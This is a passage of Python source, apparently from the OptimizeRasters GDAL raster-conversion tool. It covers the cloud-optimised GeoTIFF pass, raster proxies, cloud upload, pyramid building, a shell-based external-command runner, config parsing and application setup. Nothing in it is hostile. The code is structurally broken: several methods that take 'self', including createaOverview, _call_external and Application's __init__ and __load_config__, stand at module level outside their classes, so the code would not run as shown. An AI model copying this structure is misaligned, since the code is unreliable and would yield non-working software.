                            _input_file, CRPT_PROCESSED, CRPT_NO)
                    return False
                if (iss3 and
                        do_pyramids == CCMD_PYRAMIDS_ONLY):
                    try:
                        # *.ext__or__ temp vrt file.
                        os.remove(output_file)
                        in_ = output_file + '.ovr'
                        out_ = in_.replace('.__vrt__' + '.ovr', '.ovr')
                        if (os.path.exists(out_)):
                            # probably leftover from a previous instance.
                            os.remove(out_)
                        self.message('rename (%s=>%s)' % (in_, out_))
                        os.rename(in_, out_)
                    except BaseException:
                        self.message('Unable to rename/remove (%s)' %
                                     (output_file), self._base.const_warning_text)
                        if (_rpt):
                            _rpt.updateRecordStatus(
                                _input_file, CRPT_PROCESSED, CRPT_NO)
                        return False
        # NOTE(review): useCOGTIFF is bound only when the conversion branch above
        # runs; presumably 'cog' is never combined with pyramids-only mode — verify.
        if (useCOGTIFF and
                not isRasterProxyCaller):
            # Second gdal_translate pass to produce the cloud optimized GeoTIFF.
            inputDeflated = output_file
            output_file = output_file.replace(CloudOGTIFFExt, '')
            compression = self.m_user_config.getValue(
                'Compression')
            CompressPrefix = 'COMPRESS='
            x = [x.startswith(CompressPrefix) for x in args]
            posCompression = x.index(True)
            args[posCompression] = '{}{}'.format(
                CompressPrefix, compression)
            args.pop()  # prev / output
            args.pop()  # prev / input
            if (compression == 'jpeg'):
                gdalInfo = GDALInfo(self._base)
                gdalInfo.init(self.m_gdal_path)
                if (gdalInfo.process(inputRaster)):
                    ret = gdalInfo.bandInfo
                    # multi-band jpeg gets YCBCR photometric.
                    if (ret and
                            len(ret) != 1):
                        args.append('-co')
                        args.append('PHOTOMETRIC=YCBCR')
                QualityPrefix = 'JPEG_QUALITY='
                x = [x.startswith(QualityPrefix) for x in args]
                posQuality = -1
                cfgJpegQuality = self.m_user_config.getValue(
                    'Quality')
                if (cfgJpegQuality is None):
                    cfgJpegQuality = DefJpegQuality
                if (x and
                        True in x):
                    posQuality = x.index(True)
                if (posQuality == -1):
                    args.append('-co')
                    args.append('{}{}'.format(
                        QualityPrefix, cfgJpegQuality))
                else:
                    args[posQuality] = '{}{}'.format(
                        QualityPrefix, cfgJpegQuality)
            args.append('-co')
            args.append('COPY_SRC_OVERVIEWS=YES')
            args.append(inputDeflated)
            args.append(output_file)
            self.message(
                'Creating cloud optimized GeoTIFF (%s)' % (output_file))
            # remove any user defined GDAL translate parameters when calling GDAL_Translate for the second time to generate COG rasters.
            jstr = ' '.join(args)
            userGdalParameters = self.m_user_config.getValue(
                'GDAL_Translate_UserParameters')
            if (userGdalParameters):
                x = jstr.find(userGdalParameters)
                if (x != -1):
                    jstr = jstr.replace(userGdalParameters, '')
            # ends
            args = jstr.split()
            ret = self._call_external(args)
            try:
                os.remove(inputDeflated)
            except BaseException:
                self.message('Unable to delete the temporary file at ({})'.format(
                    inputDeflated), self._base.const_warning_text)
            self.message('Status: (%s).' %
                         ('OK' if ret else 'FAILED'))
            if (not ret):
                if (_rpt):
                    _rpt.updateRecordStatus(
                        _input_file, CRPT_PROCESSED, CRPT_NO)
                return ret
        # Do we auto generate raster proxy files as part of the raster conversion process?
        rasterProxyPath = None
        if (self.m_user_config.getValue(CCLONE_PATH)):
            mode = self.m_user_config.getValue('Mode')
            modifyProxy = True
            RecursiveCall = 'recursiveCall'
            if (not mode.endswith('mrf') and
                    RecursiveCall not in kwargs):
                # Recursive compress() call to emit the raster proxy.
                _outputPath = self._base.convertToForwardSlash(os.path.dirname(output_file))
                isCloudUpload = self._base.getBooleanValue(
                    self.m_user_config.getValue(CCLOUD_UPLOAD))
                isTmpOutput = self.m_user_config.getValue(CISTEMPOUTPUT)
                _mkOutputPath = _outputPath.replace(self.m_user_config.getValue(CTEMPOUTPUT if isTmpOutput else CCFG_PRIVATE_OUTPUT, False), '')
                rasterProxyFldr = os.path.join(self.m_user_config.getValue(CCLONE_PATH, False), _mkOutputPath)
                rasterProxyPath = os.path.join(rasterProxyFldr, os.path.basename(output_file))
                ret = self.compress(output_file, rasterProxyPath, args_Callback_for_meta,
                                    post_processing_callback=None, updateOrjobStatus=False, createOverviews=False, recursiveCall=True, **kwargs)
                errorEntries = RasterAssociates.removeRasterProxyAncillaryFiles(
                    rasterProxyPath)
                if (errorEntries):
                    for err in errorEntries:
                        self.message('Unable to delete ({})'.format(
                            err), self._base.const_warning_text)
                if (not isCloudUpload):
                    updateMRF = UpdateMRF(self._base)
                    if (updateMRF.init(rasterProxyPath, self.m_user_config.getValue(CCLONE_PATH, False), mode,
                                       self.m_user_config.getValue(CCACHE_PATH, False), self.m_user_config.getValue(CCLONE_PATH, False), self.m_user_config.getValue(COUT_VSICURL_PREFIX, False))):
                        updateMRF.copyInputMRFFilesToOutput()
                    modifyProxy = False
            if (modifyProxy):
                updateMRF = UpdateMRF(self._base)
                _output_home_path = self.m_user_config.getValue(
                    CCFG_PRIVATE_OUTPUT, False)  # cmdline arg -output
                _tempOutputPath = self.m_user_config.getValue(
                    CTEMPOUTPUT, False)
                if (_tempOutputPath):
                    _output_home_path = _tempOutputPath
                if (RecursiveCall in kwargs):
                    _output_home_path = output_file = os.path.join(
                        self.m_user_config.getValue(CCLONE_PATH, False), os.path.basename(output_file))
                if (updateMRF.init(output_file, self.m_user_config.getValue(CCLONE_PATH, False), mode,
                                   self.m_user_config.getValue(CCACHE_PATH, False), _output_home_path, self.m_user_config.getValue(COUT_VSICURL_PREFIX, False))):
                    updateMRF.copyInputMRFFilesToOutput()
        # ends
        # call any user-defined fnc for any post-processing.
        if (post_processing_callback):
            if (self._base.getBooleanValue(self.m_user_config.getValue(CCLOUD_UPLOAD))):
                self.message(
                    '[{}-Push]..'.format(self.m_user_config.getValue(COUT_CLOUD_TYPE).capitalize()))
                _processedPath = os.path.dirname(output_file[len(self.m_user_config.getValue(CTEMPOUTPUT, False)):])
                _indx = input_file.index(_processedPath)
                _input = os.path.basename(input_file) if _indx <= 0 else input_file[_indx:]
                ret = post_processing_callback(post_process_output, post_processing_callback_args, input=_input,
                                               f=post_process_output, cfg=self.m_user_config)
                self.message('Status: (%s).' % ('OK' if ret else 'FAILED'))
                _proxyPath = self.m_user_config.getValue(CCLONE_PATH)
                if (_proxyPath and
                        rasterProxyPath):
                    # Re-point the generated proxy's <Source> at the uploaded URL.
                    mode = self.m_user_config.getValue('Mode')
                    if (not mode.endswith('mrf')):
                        isOutContainerSAS = False
                        cloudHandler = self._base.getSecuredCloudHandlerPrefix(
                            CS3STORAGE_OUT)
                        if (cloudHandler is None):
                            isOutContainerSAS = (self._base.getUserConfiguration.getValue(COUT_CLOUD_TYPE, True) == CCLOUD_AZURE and
                                                 azure_storage is not None and
                                                 azure_storage._SASToken is not None)
                        if (cloudHandler or
                                isOutContainerSAS):
                            outContainer = self._base.getUserConfiguration.getValue(
                                'Out_S3_Bucket', False)
                            proxyURL = self._base.getUserConfiguration.getValue(
                                CCFG_PRIVATE_OUTPUT, False)
                            proxyFileURL = rasterProxyPath.replace(_proxyPath, proxyURL)
                            isSecured = self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseTokenOnOuput))
                            _rasterSource = ''
                            if (isSecured):
                                _rasterSource = '/{}/{}/{}'.format(cloudHandler, outContainer, proxyFileURL)
                            else:
                                urlPrefix = self._base.getUserConfiguration.getValue(
                                    COUT_VSICURL_PREFIX, False)
                                if (urlPrefix):
                                    if (isOutContainerSAS):
                                        _rasterSource = '{}{}?{}'.format(urlPrefix, proxyFileURL[len(self.m_user_config.getValue(CCFG_PRIVATE_OUTPUT, False)):], azure_storage._SASToken)
                                    else:
                                        _rasterSource = '{}{}'.format(urlPrefix, os.path.basename(rasterProxyPath))
                            if (not isOutContainerSAS):
                                _rasterSource = self._base.urlEncode(_rasterSource)
                            doc = minidom.parse(rasterProxyPath)
                            nodes = doc.getElementsByTagName('Source')
                            if (nodes):
                                nodes.pop().firstChild.nodeValue = _rasterSource
                                with open(rasterProxyPath, 'w') as writer:
                                    writer.write(doc.childNodes[0].toxml())
        # ends
    if (_rpt and
            _rpt.operation != COP_UPL):
        # Mark success in the report; (.til) inputs flag their member rasters too.
        if (til and
                _input_file.lower().endswith(CTIL_EXTENSION_)):
            originalSourcePath = til.findOriginalSourcePath(_input_file)
            if (originalSourcePath is not None):
                _rpt.updateRecordStatus(
                    originalSourcePath, CRPT_PROCESSED, CRPT_YES)
                for TilRaster in til._tils_info[originalSourcePath.lower()][TIL.CKEY_FILES]:
                    _rpt.updateRecordStatus(self._base.convertToForwardSlash(os.path.dirname(
                        originalSourcePath), True) + TilRaster, CRPT_PROCESSED, CRPT_YES)
            return ret
        if (isRasterProxyCaller):
            return ret
        _rpt.updateRecordStatus(_input_file, CRPT_PROCESSED, CRPT_YES)
    return ret
def createaOverview(self, input_file, isBQA=False, **kwargs):
    """Create pyramids/overviews for input_file via gdaladdo.

    isBQA forces 'nearest' resampling (Landsat QA bands). Returns True when
    pyramids are skipped (proxy modes, .til members, .ecw, image too small)
    or the result of the external gdaladdo call otherwise.
    """
    if (CreateOverviews in kwargs):
        if (not kwargs[CreateOverviews]):
            # skip if called by a create raster proxy operation.
            return True
    pyFactor = '2'
    pySampling = 'average'
    mode = self.m_user_config.getValue('Mode')
    if (mode):
        # Proxy/clone modes never build overviews locally.
        if (mode == 'cachingmrf' or
                mode == 'clonemrf' or
                mode == 'rasterproxy' or
                mode == 'splitmrf'):
            return True
    # skip pyramid creation on (tiffs) related to (til) files.
    if (til):
        (p, n) = os.path.split(input_file)
        if (til.find(n)):
            return True
    # ends
    # skip pyramid creation for (.ecw) files.
    if (input_file.lower().endswith('.ecw')):
        return True
    # ends
    self.message('Creating pyramid ({})'.format(input_file))
    # let's input cfg values..
    pyFactor_ = self.m_user_config.getValue('PyramidFactor')
    if (pyFactor_ and
            pyFactor_.strip()):
        # can be commna sep vals in the cfg file.
        pyFactor = pyFactor_.replace(',', ' ')
    else:
        # No explicit factors: derive the levels from the image dimensions.
        gdalInfo = GDALInfo(self._base, self.message)
        gdalInfo.init(self.m_gdal_path)
        if (gdalInfo.process(input_file)):
            pyFactor = gdalInfo.pyramidLevels
        if (not pyFactor):
            self.message('Pyramid creation skipped for file ({}). Image size too small.'.format(
                input_file), const_warning_text)
            return True
    pySampling_ = self.m_user_config.getValue('PyramidSampling')
    if (pySampling_):
        pySampling = pySampling_
        if (pySampling.lower() == 'avg' and
                input_file.lower().endswith(CTIL_EXTENSION_)):
            pySampling = 'average'
    pyCompression = self.m_user_config.getValue('PyramidCompression')
    args = [os.path.join(self.m_gdal_path, self.CGDAL_ADDO_EXE)]
    args.append('-r')
    args.append('nearest' if isBQA else pySampling)
    pyQuality = self.m_user_config.getValue('Quality')
    pyInterleave = self.m_user_config.getValue(CCFG_INTERLEAVE)
    if (pyCompression == 'jpeg' or
            pyCompression == 'png'):
        if (not mode.startswith('mrf')):
            # External overviews (-ro) and the overview codec configs only
            # apply to non-MRF outputs.
            pyExternal = False
            pyExternal_ = self.m_user_config.getValue('Pyramids')
            if (pyExternal_):
                pyExternal = pyExternal_ == CCMD_PYRAMIDS_EXTERNAL
            if (pyExternal):
                args.append('-ro')
            if (mode.startswith('tif') and
                    pyCompression == 'jpeg' and
                    pyInterleave == 'pixel'):
                args.append('--config')
                args.append('PHOTOMETRIC_OVERVIEW')
                args.append('YCBCR')
            args.append('--config')
            args.append('COMPRESS_OVERVIEW')
            args.append(pyCompression)
            args.append('--config')
            args.append('INTERLEAVE_OVERVIEW')
            args.append(pyInterleave)
            args.append('--config')
            args.append('JPEG_QUALITY_OVERVIEW')
            args.append(pyQuality)
    args.append(input_file)
    pyFactors = pyFactor.split()
    for f in pyFactors:
        args.append(f)
    sourcePath = input_file
    if ('source' in kwargs):
        sourcePath = kwargs['source']
    return self._call_external(args, name=sourcePath, method=TimeIt.Overview, store=self._base)
@TimeIt.timeOperation
def _call_external(self, args, messageCallback=None, **kwargs):
    """Run an external command (args joined into one shell line) and relay
    its stdout/stderr lines through message().

    Returns False when stderr contains an 'ERROR' line (ECW .so warnings on
    Linux are exempted), True otherwise. messageCallback, when given, also
    receives every stderr line.
    NOTE(review): stdout is drained one line per 0.5s poll; a very chatty
    child could presumably fill the pipe buffer and stall — verify.
    """
    if (CRUN_IN_AWSLAMBDA):
        # Lambda executes the binary previously staged under /tmp.
        tmpELF = '/tmp/{}'.format(os.path.basename(args[0]))
        args[0] = tmpELF
    p = subprocess.Popen(' '.join(args), shell=True,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    message = ''
    messages = []
    val = p.poll()
    while (val is None):
        time.sleep(0.5)
        val = p.poll()
        message = p.stdout.readline()
        if (message):
            messages.append(message.strip())
    if (messages):
        self.message('messages:')
        for m in messages:
            self.message(m)
    if (not p.stderr):
        return True
    warnings = p.stderr.readlines()
    if (warnings):
        self.message('warnings/errors:')
        is_error = False
        for w in warnings:
            w = w.strip()
            if (isinstance(w, bytes)):
                w = bytes.decode(w)
            if (not is_error):
                if (w.find('ERROR') >= 0):
                    is_error = True
                    if (w.find('ECW') >= 0 and
                            self._base.isLinux()):  # temp fix to get rid of (no version information available) warnings for .so under linux
                        is_error = False
            self.message(w)
            if (messageCallback):
                messageCallback(w)
        if (is_error):
            return False
    return True
class BundleMaker(Compression):
    """Drives the external BundleMaker tool to emit cache bundles for a raster."""
    CBUNDLEMAKER_BIN = 'BundleMaker'
    CPROJ4SO = 'libproj.so'
    CMODE = 'bundle'
    CLEVEL = 'level'

    def __init__(self, inputRaster, *args, **kwargs):
        super(BundleMaker, self).__init__(*args, **kwargs)
        self.inputRaster = inputRaster
        self.bundleName = None  # e.g. 'Rae80C11080'
        self.level = None

    def init(self):
        """Locate (and, under Lambda, stage into /tmp) the BundleMaker binary."""
        if (not super(BundleMaker, self).init()):
            return False
        self.homePath = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), 'BundleMaker')
        if (not CRUN_IN_AWSLAMBDA):
            return True
        lambdaBin = '/tmp/{}'.format(self.CBUNDLEMAKER_BIN)
        if (not self._base.copyBinaryToTmp(
                os.path.join(self.homePath, self.CBUNDLEMAKER_BIN), lambdaBin)):
            return False
        if (not self._lambdaCopySharedSO(self.CPROJ4SO)):
            return False
        self.homePath = lambdaBin
        return True

    def _messageCallback(self, msg):
        # Capture the cache level the tool reports (last token of the line).
        if (self.level is not None):
            return
        if (msg.startswith('Output at level')):
            self.level = msg[msg.rfind(' ') + 1:]

    def run(self):
        """Invoke BundleMaker for self.inputRaster; upload the .mrf if requested."""
        reporter = self._base.getUserConfiguration.getValue(
            CPRT_HANDLER)
        if (not reporter):
            return False
        header = reporter._header
        if (Report.CHDR_TEMPOUTPUT not in header or
            self.CMODE not in header or
                self.CLEVEL not in header):
            return False
        self.bundleName = header[self.CMODE]
        self.level = header[self.CLEVEL]
        binPath = self.homePath if CRUN_IN_AWSLAMBDA else os.path.join(
            self.homePath, '{}.exe'.format(self.CBUNDLEMAKER_BIN))
        args = [binPath, '-level', self.level, '-bundle', self.bundleName,
                self.inputRaster, header[Report.CHDR_TEMPOUTPUT]]
        self.message('BundleMaker> ({})'.format(self.inputRaster))
        ret = self._call_external(args)
        if (not ret or
                not self.level):
            return ret
        if (self._base.getBooleanValue(header[Report.CHDR_CLOUDUPLOAD])):
            self._base.S3Upl(os.path.join(
                header[Report.CHDR_TEMPOUTPUT],
                '_alllayers/L{}/{}.mrf'.format(self.level, self.bundleName)), None)
        return True
class Config:
    """Flat key/value view over one level of an XML configuration document."""

    def __init__(self):
        pass

    def init(self, config, root):
        """Parse *config* and load the children of the first <root> element.

        Returns False on parse failure or when <root> is absent.
        """
        try:
            self.m_doc = minidom.parse(config)
        except BaseException:
            return False
        nodes = self.m_doc.getElementsByTagName(root)
        if (len(nodes) == 0):
            return False
        self.m_cfgs = {}
        child = nodes[0].firstChild
        while (child):
            # First occurrence of a tag wins; empty elements are skipped.
            if (child.hasChildNodes() and
                    child.nodeName not in self.m_cfgs):
                self.m_cfgs[child.nodeName] = child.firstChild.nodeValue
            child = child.nextSibling
        return True

    def getValue(self, key, toLower=True):  # returns (value) or None
        """Fetch *key*; lower-cases string values unless toLower is False."""
        if (key not in self.m_cfgs):
            return None
        value = self.m_cfgs[key]
        if (toLower):
            try:  # trap any non-strings
                return value.lower()
            except BaseException:
                pass
        return value

    def setValue(self, key, value):
        """Store *key*; an existing mutable (list) value gets *value* appended."""
        if (key in self.m_cfgs and
                hasattr(self.m_cfgs[key], '__setitem__')):
            self.m_cfgs[key].append(value)
            return
        self.m_cfgs[key] = value
def getInputOutput(inputfldr, outputfldr, file, isinput_s3):
    """Resolve the effective (input_file, output_file) pair for one raster.

    Handles http(s)/vsicurl inputs, Azure SAS suffixes, and the -tempinput /
    -tempoutput staging folders. Relies on module globals (cfg, getBooleanValue).
    """
    input_file = os.path.join(inputfldr, file)
    output_file = os.path.join(outputfldr, file)
    lowered = input_file.lower()
    if (lowered.startswith(('http://', 'https://'))):
        # Route http(s) sources through GDAL's /vsicurl/ handler.
        cfg.setValue(CIN_S3_PREFIX, '/vsicurl/')
        input_file = input_file.replace('\\', '/')
        isinput_s3 = True
    if (not isinput_s3):
        return (input_file, output_file)
    azSAS = cfg.getValue(CFGAZSAS, False)
    input_file = '{}{}{}'.format(cfg.getValue(CIN_S3_PREFIX, False),
                                 input_file, '?' + azSAS if azSAS else '')
    output_file = outputfldr
    if (getBooleanValue(cfg.getValue(CISTEMPINPUT)) or
            getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
        output_file = os.path.join(output_file, file)
        if (getBooleanValue(cfg.getValue(CISTEMPINPUT))):
            input_file = os.path.join(
                cfg.getValue(CTEMPINPUT, False), file)
        if (getBooleanValue(cfg.getValue(CISTEMPOUTPUT))):
            tempOutput = cfg.getValue(CTEMPOUTPUT, False)
            relative = file
            # http source raster entries without -tempinput will have subfolder info in (output_file)
            if (output_file.startswith(tempOutput)):
                relative = output_file.replace(tempOutput, '')
            output_file = os.path.join(
                cfg.getValue(CTEMPOUTPUT, False), relative)
        return (input_file, output_file)
    output_file = os.path.join(output_file, file)
    return (input_file, output_file)
def formatExtensions(value):
    """Split a comma-separated extension string into a list of trimmed tokens.

    value: e.g. 'tif, mrf ,png' -> ['tif', 'mrf', 'png'].
    Returns [] for None or whitespace-only input.
    """
    if (value is None or
            not value.strip()):
        return []
    # Comprehension replaces the original index loop that mutated the list in place.
    return [ext.strip() for ext in value.split(',')]
# custom exit code block to write out logs
def terminate(objBase, exit_code, log_category=False):
    """Emit the closing status line, flush logs, and hand back *exit_code*."""
    if (objBase):
        status = 'OK' if exit_code == 0 else 'Failed!'
        objBase.message('[{}]'.format(status), objBase.const_status_text)
        if (log_category):
            log.CloseCategory()  # module-level logger
        objBase.close()  # persist information/errors collected.
    return (exit_code)
# ends
# collect input files to support (resume) support.
def fn_collect_input_files(src):
    """Add *src* to the global job report (g_rpt) when report generation is on.

    Returns True only when the file was recorded; False otherwise.
    """
    if (not src):
        return False
    if (not g_is_generate_report or
            not g_rpt):
        return False
    try:
        path = str(src)  # input (src) could be an object
        if (path.startswith('<Key')):
            # cloud listing entries render as '<Key: bucket,key>' — keep the key part.
            path = path.split(',')[1].replace('>', '')
        g_rpt.addFile(path)
        return True
    except BaseException:
        pass
    return False
def fn_pre_process_copy_default(src, dst, arg):
    """Pre-copy hook: returns False to skip copying (report-only runs / bad src)."""
    if (fn_collect_input_files(src)):
        # just gathering information for the report either (op=report). Do not proceed with (Copying/e.t.c)
        return False
    if (not src):
        return False
    if (til and
            src.lower().endswith(CTIL_EXTENSION_)):
        til.setOutputPath(src, dst)
    return True
def fn_copy_temp_dst(input_source, cb_args, **kwargs):
    """Move the file group of *input_source* from -tempoutput to the final output.

    kwargs['cfg'] must carry the user configuration; returns False when nothing
    needs moving or -tempoutput is not enabled.
    """
    copier = Copy()
    group = copier.get_group_filelist(input_source)
    if (not group):
        return False  # no copying.
    moveList = []
    for item in group:
        (path, name) = os.path.split(item.replace('\\', '/'))
        if (not isinstance(kwargs, dict) or
                'cfg' not in kwargs):
            continue
        userCfg = kwargs['cfg']
        if (not getBooleanValue(userCfg.getValue(CISTEMPOUTPUT))):
            return False  # no copying..
        path += '/'
        # normalize both roots so the replace below matches reliably.
        tempOut = userCfg.getValue(CTEMPOUTPUT, False).replace('\\', '/')
        if (not tempOut.endswith('/')):
            tempOut += '/'
        privateOut = userCfg.getValue(CCFG_PRIVATE_OUTPUT, False).replace('\\', '/')
        if (not privateOut.endswith('/')):
            privateOut += '/'
        moveList.append(
            {'src': path, 'dst': path.replace(tempOut, privateOut), 'f': name})
    if (moveList):
        copier.batch(moveList, {'mode': 'move'}, None)
    return True
class Args:
    """Attribute bag for command-line arguments; unknown attributes read as None."""

    def __init__(self):
        pass

    def __setattr__(self, name, value):
        self.__dict__[name] = value

    def __getattr__(self, name):
        # Invoked only for attributes not found normally; report them as None.
        try:
            return self.__dict__[name]
        except KeyError:
            return None

    def __str__(self):
        # 'k1=v1,k2=v2' — join replaces the original manual trailing-comma trim.
        return ','.join('{}={}'.format(k, self.__getattr__(k))
                        for k in self.__dict__)
def makedirs(filepath):
    """Create *filepath* (with parents), silently tolerating an existing path."""
    try:
        os.makedirs(filepath)
    except Exception:
        # Anything already at the path (dir or file, possibly created
        # concurrently) is accepted; genuine failures propagate.
        if (not os.path.exists(filepath)):
            raise
class Application(object):
    """Top-level driver: parses args/config, sets up logging, and runs jobs."""
    # Release stamps; surfaced in the console banner and in log headers.
    __program_ver__ = 'v2.0.6f'
    __program_date__ = '20211010'
    __program_name__ = 'OptimizeRasters.py {}/{}'.format(
        __program_ver__, __program_date__)
    __program_desc__ = 'Convert raster formats to a valid output format through GDAL_Translate.\n' + \
        '\nPlease Note:\nOptimizeRasters.py is entirely case-sensitive, extensions/paths in the config ' + \
        'file are case-sensitive and the program will fail if the correct path/case is not ' + \
        'entered at the cmd-line or in the config file.\n'
def __init__(self, args):
    """Capture user args; the heavy setup happens later in init()."""
    self._usr_args = args
    self._base = None
    self._log_path = None
    self._msg_callback = None
    self._postMessagesToArcGIS = False
def __load_config__(self, config):
    """Load the XML config (module-global `cfg`), honoring .orjob overrides.

    Resolves the config path (possibly from a resume .orjob header), reads in
    raster/exclude extension lists, and validates/normalizes the -mode value.
    Returns False on any failure.
    """
    global cfg
    if (self._args is None):
        return False
    # read in the config file.
    if (not self._args.config):
        # fall back to the default config shipped next to this script.
        self._args.config = os.path.abspath(
            os.path.join(os.path.dirname(__file__), CCFG_FILE))
    config_ = self._args.config
    if (self._args.input and  # Pick up the config file name from a (resume) job file.
            self._args.input.lower().endswith(Report.CJOB_EXT)):
        _r = Report(Base())
        if (not _r.init(self._args.input)):
            self.writeToConsole('Err. ({})/init'.format(self._args.input))
            return False
        # Big .orjob files can take some time.
        self.writeToConsole('ORJob> Reading/Preparing data. Please wait..')
        if (not _r.read()):
            self.writeToConsole('Err. ({})/read'.format(self._args.input))
            return False
        self.writeToConsole('ORJob> Done.')  # msg end of read.
        if (CRPT_HEADER_KEY in _r._header):
            config_ = _r._header[CRPT_HEADER_KEY]
        if (Report.CHDR_MODE in _r._header):
            # mode in .orjob has priority over the template <Mode> value.
            self._args.mode = _r._header[Report.CHDR_MODE]
        if (Report.CHDR_OP in _r._header):
            self._args.op = _r._header[Report.CHDR_OP]
        _r = None
    # replace/force the original path to abspath.
    self._args.config = os.path.abspath(config_).replace('\\', '/')
    cfg = Config()
    ret = cfg.init(config_, 'Defaults')
    if (not ret):
        msg = 'Err. Unable to read-in settings from ({})'.format(config_)
        # log file is not up yet, write to (console)
        self.writeToConsole(msg, const_critical_text)
        return False
    # ends
    # deal with cfg extensions (rasters/exclude list)
    opCopyOnly = False
    operation = cfg.getValue(COP)
    if (not operation):
        operation = self._args.op
    if (operation):
        # no defaults for (CCFG_RASTERS_NODE, CCFG_EXCLUDE_NODE) if op={COP_COPYONLY}
        opCopyOnly = operation == COP_COPYONLY
    rasters_ext_ = cfg.getValue(CCFG_RASTERS_NODE, False)
    if (rasters_ext_ is None and
            not opCopyOnly):
        # defaults: in-code if defaults are missing in cfg file.
        rasters_ext_ = 'tif,mrf'
    exclude_ext_ = cfg.getValue(CCFG_EXCLUDE_NODE, False)
    if (exclude_ext_ is None and
            not opCopyOnly):
        # defaults: in-code if defaults are missing in cfg file.
        exclude_ext_ = 'ovr,rrd,aux.xml,idx,lrc,mrf_cache,pjp,ppng,pft,pzp,pjg'
    cfg.setValue(CCFG_RASTERS_NODE, [] if opCopyOnly else formatExtensions(
        rasters_ext_))  # {CCFG_RASTERS_NODE} entries not allowed for op={COP_COPYONLY}
    cfg.setValue(CCFG_EXCLUDE_NODE, formatExtensions(exclude_ext_))
    cfg.setValue('cmdline', self._args)
    # ends
    # init -mode
    # cfg-init-valid modes
    cfg_modes = {
        'tif',
        'tif_lzw',
        'tif_jpeg',
        'tif_cog',
        'tif_mix',
        'tif_dg',
        'tiff_landsat',
        'mrf',
        'mrf_jpeg',
        'mrf_mix',
        'mrf_dg',
        'mrf_landsat',
        'cachingmrf',
        'clonemrf',
        'rasterproxy',
        'splitmrf',
        BundleMaker.CMODE,
        'aid'
    }
    # ends
    # read-in (-mode)
    # cmd-line -mode overrides the cfg value.
    cfg_mode = self._args.mode
    if (cfg_mode is None):
        cfg_mode = cfg.getValue('Mode')
    if (cfg_mode is None or
            (not cfg_mode.lower() in cfg_modes)):
        Message('<Mode> value not set/illegal ({})'.format(str(cfg_mode)),
                Base.const_critical_text)
        return False
    cfg_mode = cfg_mode.lower()
    cfg.setValue('Mode', cfg_mode)
    # ends
    return True
def __setupVersionCheck(self):
    """Optionally check for a newer OptimizeRasters release and report it."""
    self._base._m_log.CreateCategory('VersionCheck')
    try:
        from ProgramCheckAndUpdate import ProgramCheckAndUpdate
    except ImportError:
        # The optional updater module isn't shipped; warn and move on.
        self._base.message('ProgramCheckAndUpdate module is not found, unable to check version updates.',
                           self._base.const_warning_text)
        self._base._m_log.CloseCategory()
        return False
    updater = ProgramCheckAndUpdate()
    self._base.message('Checking for updates..')
    verMessage = updater.run(
        os.path.dirname(os.path.realpath(__file__)))
    if (verMessage is not None):
        self._base.message(verMessage)
    self._base._m_log.CloseCategory()
    return True
def __setupLogSupport(self):
    """Initialize the optional SolutionsLog logger and return a Base wrapper.

    Falls back gracefully (log stays None) when the logger module or log
    folder is unavailable; also dumps cmd-line args and config values to the
    log for diagnostics.
    """
    log = None
    try:
        solutionLib_path = os.path.realpath(__file__)
        if (not os.path.isdir(solutionLib_path)):
            solutionLib_path = os.path.dirname(solutionLib_path)
        _CLOG_FOLDER = 'logs'
        self._log_path = os.path.join(solutionLib_path, _CLOG_FOLDER)
        sys.path.append(os.path.join(solutionLib_path, 'SolutionsLog'))
        import logger  # optional project-local logging package
        log = logger.Logger()
        log.Project('OptimizeRasters')
        log.LogNamePrefix('OR')
        log.StartLog()
        cfg_log_path = cfg.getValue(CFGLogPath)
        if (self._args.job):
            # -job takes priority as the log destination.
            cfg_log_path = self._args.job
        if (not cfg_log_path):
            LogPath = 'logPath'
            if (LogPath in self._usr_args):
                cfg_log_path = self._usr_args[LogPath]
        if (cfg_log_path):
            if (cfg_log_path.lower().endswith(Report.CJOB_EXT)):
                # a .orjob path was given; log beside it.
                (cfg_log_path, f) = os.path.split(cfg_log_path)
            if (not os.path.isdir(cfg_log_path)):
                try:
                    os.makedirs(cfg_log_path)
                except Exception as e:
                    Message('Invalid log-path (%s). Resetting to (%s)' %
                            (cfg_log_path, self._log_path))
                    cfg_log_path = None
        if (cfg_log_path):
            self._log_path = os.path.join(cfg_log_path, _CLOG_FOLDER)
            log.SetLogFolder(self._log_path)
            print('Log-path set to ({})'.format(self._log_path))
    except Exception as e:
        print('Warning: External logging support disabled! ({})'.format(str(e)))
    # let's write to log (input config file content plus all cmd-line args)
    if (log):
        log.Message('version={}/{}'.format(Application.__program_ver__,
                                           Application.__program_date__), const_general_text)
        # inject cmd-line
        log.CreateCategory('Cmd-line')
        cmd_line = []
        _args_text = str(self._args).replace(
            'Namespace(', '').replace('\\\\', '/')
        _args_text_len = len(_args_text)
        # strip the trailing ')' of an argparse repr before splitting on ','.
        _args = _args_text[:_args_text_len - 1 if _args_text[-1:]
                           == ')' else _args_text_len].split(',')
        for arg in _args:
            try:
                (k, v) = arg.split('=')
            except BaseException:
                log.Message('Invalid arg at cmd-line (%s)' %
                            (arg.strip()), const_critical_text)
                continue
            if (v != 'None'):
                cmd_line.append(
                    '-{}'.format(arg.replace('\'', '"').strip()))
        log.Message(' '.join(cmd_line), const_general_text)
        log.CloseCategory()
        # ends
        # inject cfg content
        log.CreateCategory('Input-config-values')
        for v in cfg.m_cfgs:
            if (v == 'cmdline'):
                continue
            log.Message('%s=%s' % (v, cfg.m_cfgs[v]), const_general_text)
        log.CloseCategory()
        # ends
    return Base(log, self._msg_callback, cfg)
def writeToConsole(self, msg, status=const_general_text):
    """Route *msg* to the registered callback; otherwise print to stdout."""
    if (not self._msg_callback):
        print(msg)  # log file is not up yet, write to (console)
        return True
    return (self._msg_callback(msg, status))
@property
def configuration(self):
    """Raw key/value store of the active user configuration (None before init)."""
    base = self._base
    return None if base is None else base.getUserConfiguration.m_cfgs

@configuration.setter
def configuration(self, value):
    # Replace the live config dict; sync the report header if one is active.
    self._base.getUserConfiguration.m_cfgs = value
    if (_rpt and
            COP_RPT in value):
        _rpt._header = value[COP_RPT]._header
        _rpt.write()
def getReport(self):
    """Return the active Report, creating one via op=createJob when absent."""
    global _rpt
    if (_rpt):
        return _rpt
    savedOp = self._args.op
    self._args.op = COP_CREATEJOB
    if (not self.run()):
        self._args.op = savedOp
        return None
    jobFile = os.path.join(os.path.dirname(
        __file__), cfg.getValue(CPRJ_NAME, False)) + Report.CJOB_EXT
